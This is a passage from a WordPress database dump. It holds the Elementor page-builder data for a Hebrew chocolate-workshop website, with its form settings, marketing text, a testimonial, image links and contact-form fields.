abels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1315,264,'_elementor_version','0.4'),(1317,265,'_wp_page_template','elementor_header_footer'),(1318,265,'_elementor_edit_mode','builder'),(1319,265,'_elementor_data','[{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3U4\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\